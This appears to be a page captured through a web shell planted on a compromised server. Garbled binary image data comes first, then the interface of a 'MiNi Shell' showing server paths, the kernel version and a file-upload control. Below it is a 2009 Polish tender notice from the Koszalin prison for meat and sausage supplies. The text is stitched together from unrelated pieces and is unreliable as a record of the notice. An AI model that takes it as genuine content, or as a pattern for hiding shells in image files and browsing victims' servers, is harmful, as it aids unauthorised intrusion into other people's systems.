JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090605/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090605/181326-N-2009.html

<p class="kh_header"><b>Koszalin: Zamówienie publiczne 2/ż/2009 dotyczące dostaw mięsa i wędlin</b><br>
<b>Numer ogłoszenia: 181326 - 2009; data zamieszczenia: 05.06.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny , ul. Strefowa 17, 75-950 Koszalin, woj. zachodniopomorskie, tel. 094 3475200, faks 094 3410042.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zamówienie publiczne 2/ż/2009 dotyczące dostaw mięsa i wędlin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są dostawy produktów zwierzęcych, mięsa i wyrobów mięsnych, które wg Wspólnego Słownika Zamówień należą do grupy15100000-9 oraz 15412100-0. Artykuły spożywcze objęte tym postępowaniem muszą spełniać wymagania norm PN lub europejskich norm zharmonizowanych: PN-65/A-82000; PN-A-82007:1996 wraz ze zmianą PN-A-82007/A1:1998; PN-A-82022; PN-76/A-85700; PN - 88/A-85804; PN-A-86523; PN-A-86525; PN-A-86526:1995 wraz ze zmianą; PN-A-86527 oraz PN-92/A-86521,PN-A-86524.
Kiszka ziemniaczana jest wyrobem we flaku jadalnym. Kiełbasa w nojaxie - jest to parówka cienka we flaku niejadalnym.  Wędliny oraz mięso winny mieć termin przydatności nie krótszy niż 5 dni (przechowywane w warunkach chłodniczych),a wyroby podrobowe winny mieć termin przydatności nie krótszy niż 48h licząc od dnia zrealizowania dostawy. Wszystkie artykuły mają mieć barwę swoistą dla danego wyrobu, osłonki nie mogą odchodzić od farszu, niedopuszczalna jest barwa szarozielona oraz zawilgocenie osłonki.
Dowóz dostaw gwarantuje wykonawca własnym środkiem transportu, który posiada stosowne decyzje administracyjne wydane przez urzędowe organy kontroli żywności,  w terminie podanym przez zamawiającego. Wykonawca odpowiada za stan techniczny i jakościowy dostarczanych produktów do magazynów żywnościowych znajdujących się na terenie zakładu zamawiającego. Każdy dostarczany produkt musi posiadać oznakowanie zgodnie z zapisami rozdziału 11 ustawy o bezpieczeństwie żywności i żywienia ( Dz. U. z 2006 r. nr 171 poz. 1225 ze zmianami). Wykonawca dostarcza przy każdej dostawie Handlowy Dokument Identyfikacyjny oraz na każde żądanie zamawiającego atestaty jakości (lub certyfikaty jakości, jeżeli takie posiada).                         W uzasadnionych przypadkach zamawiający zastrzega sobie prawo dokonania, na koszt dostawcy badania dostarczanego towaru pod względem spełniania wymagań określonych w specyfikacji istotnych warunków zamówienia. W przypadku, gdy wykonawca nie jest producentem środków spożywczych ujętych w grupie asortymentowej zobowiązany jest do dołączenia do oferty listy wszystkich podwykonawców, od których będzie pozyskiwał środki spożywcze i wszystkich podwykonawców, za pomocą których będzie realizowany przedmiot zamówienia. Wykonawca jest zobowiązany zaznaczyć w ofercie części zamówienia, których wykonanie będzie powierzone podwykonawcy.
Lp.
Nazwa artykułu                 Ilość kg                                    Kwota wadium w zł
1 blok drobiowy               1000kg     wadium                                    119,80zł
2 blok z indyka                1000   kg wadium                                        150,20zł
3 blok szwajcarski            1000 kg   wadium                                       102,80zł
4 boczek mielony	          1000 kg     wadium                                     93,20zł
5 flaki wołowe  	          500  kg     wadium                                      56,50zł
6 indyk  mrożony 	          3000  kg   wadium                                      516,60zł
7 karkówka z/k               1300   kg  wadium                                       204,10zł
8 kaszanka 	          700  kg   wadium                                          28,28zł
9 kiełbasa biała parzona    900  kg    wadium                                         95,76zł
10kiełbasa biwakowa        900   kg   wadium                                         81,18zł
11kiełbasa jarmarczna      900  kg    wadium                                         85,68zł
12kieł. krakowska parzona drobiowa  200 kg  wadium                              32,24zł
13kiełbasa kanapkowa 	           800 kg wadium                               73,44zł
14kiełbasa lunch-meat                    1000 kg wadium                             101,40zł
15kiełbasa mortadela 	           1000  kg  wadium                           79,00zł
16kiełbasa ogniskowa 	           1000  kg  wadium                           92,40zł
17kiełbasa parówkowa drobiowa       800   kg  wadium                            67,36zł
18kiełbasa pasztetowa 	           800  kg wadium                              31,68zł
19kiełbasa popularna drobiowa         200 kg  wadium                              22,72zł
20kiełbasa popularna 	          1000 kg  wadium                             94,20zł
21kiełbasa studencka 	          700  kg  wadium                              65,94zł
22kiełbasa swojska 	          900  kg  wadium                              96,84zł
23kiełbasa szynkowa wieprzowa      200    kg wadium                             35,60zł
24kiełbasa szynkowa drobiowa        200  kg   wadium                             34,92zł
25kiełbasa śląska 	                      200   kg  wadium                              24,48zł
26kiełbasa śniadaniowa                 800  kg   wadium                              74,08zł
27kiełbasa w nojaxie 	         1000  kg wadium                               82,00zł
28kiełbasa zwyczajna drobiowa      1000  kg  wadium                              95,80zł
29kiszka ziemniaczana 	         1100  kg  wadium                             119,68zł
30kurczak mrożony                      3000 kg  wadium                               333,00zł
31łopatka wieprzowa 	         2000   kg wadium                              226,00zł
32metka 		                      600  kg   wadium                              48,96zł
33mielonka tyrolska 	         700  kg   wadium                              71,54zł
34nerki wieprzowe                       700   kg  wadium                               23,38zł
35pasztet pieczony 	         800  kg  wadium                                71,04zł
36pieczeń delikatesowa 	         1000 kg wadium                                 88,40zł
37podgardle wędzone 	        900 kg    wadium                                66,24zł
38Polędwica z indyka                  200  kg   wadium                                 33,44zł
39salceson czarny 	                    400  kg  wadium                                   22,40zł
40salceson włoski 	                    500  kg  wadium                                  31,10zł
41serca drobiowe 	                    800  kg  wadium                                 65,76zł
42smalec wieprzowy	       800   kg wadium                                 31,84zł
43serdelki drobiowe 	       900   kg  wadium                                 74,34zł
44szynka mozaika drobiowa         200 kg    wadium                                  30,80zł
45szynka mielona drobiowa         600  kg   wadium                                  66,72zł
46szynka gotowana	      200  kg  wadium                                    38,56zł
47szynka tyrolska	                   200  kg  wadium                                    23,32zł
48wątroba    wieprzowa             900  kg wadium                                     38,70zł
49wołowina kl.II 	                   2000  kg  wadium                                298,80zł
50żołądki drobiowe 	      800   kg   wadium                                  91,20zł.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.41.21.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 50.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> dla całości zamówienia 4 533,42zł. Kwoty wadium dla poszczególnych części zamówienia podano w pkt. 3 specyfikacji istotnych warunków zamówienia.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1) W postępowaniu mogą wziąć udział wykonawcy, którzy spełniają warunki art. 22 ust.1 Prawa Zamówień Publicznych z dnia 29.01.2004r.(tekst jednolity Dz.U.z 2007 r. Nr 223, poz. 1655 oraz z 2008r. Nr 171, poz. 1058) i nie podlegają wykluczeniu na podstawie art. 24 ustawy Prawa Zamówień Publicznych, oraz którzy zaoferują dostawy artykułów objętych niniejszym postępowaniem, odpowiadające wymaganiom określonym przez zamawiającego. 
2) Wykonawca winien spełniać wymagania działu IV ustawy z dnia 25 sierpnia 2006 r.                            o  bezpieczeństwie żywności i żywienia (Dz. U. z 2006 r. nr 171 poz. 1225 ze zmianami).
3) Wykonawca powinien dysponować środkiem transportu przystosowanym do przewozu artykułów spożywczych utrzymującym parametry dotyczące temperatury przechowywania produktów (chłodnia i/lub mroźnia) posiadającym zaświadczenie dopuszczające pojazd do przewozu żywności wystawione przez Państwową Inspekcję Sanitarną lub inny organ do tego uprawniony (np.: Powiatowego Lekarza  Weterynarii). 
4) Wykonawca powinien dysponować personelem przeszklonym i posiadającym zaświadczenie             o uzyskaniu kwalifikacji w zakresie podstawowych zagadnień higieny wymaganych od osób biorących udział w produkcji lub obrocie środkami spożywczymi. 
	Spełnianie warunków udziału w postępowaniu zostanie przez Zamawiającego ocenione poprzez zbadanie treści oświadczeń  i dokumentów przedłożonych przez wykonawców..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenia lub dokumenty dostarczane przez oferentów w celu potwierdzenia spełniania warunków udziału w postępowaniu:
1- aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu do składania ofert zgodnie z § 1 ustęp 1 punkt 2 Rozp. Prezesa Rady Ministrów z dnia 19.05.2006r. Dz. U. Nr 87 poz.605). 
2- Wykaz środków transportu przewidywanych do realizacji zamówienia; wykaz musi zawierać następujące dane: status własności pojazdu (własny/dzierżawiony), markę pojazdu, rok produkcji pojazdu, nr rejestracyjny pojazdu, wraz z decyzjami administracyjnymi organów urzędowej kontroli żywności, że środki te spełniają wymagania sanitarne do przewozu żywności. 
3- Kopię, wydanego przez akredytowany podmiot, certyfikatu bezpieczeństwa zdrowotnego żywności HACCP, a w przypadku nieposiadania takiego certyfikatu podpisane przez wykonawcę oświadczenie, że Wykonawca spełnia wymagania ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności                  i żywienia (Dz. U. z 2006 r. nr 171 poz. 1225 ze zmianami).
4- oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art.44 ustawy-załącznik nr 2
Dokumenty (prócz oświadczeń) mogą być złożone w formie oryginału lub kopii poświadczonej przez wykonawcę za zgodność z oryginałem..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny w Koszalinie ul. Strefowa 17.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.06.2009 godzina 11:00, miejsce: Sekretariat Zakładu Karnego w Koszalinie ul. Strefowa 17.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com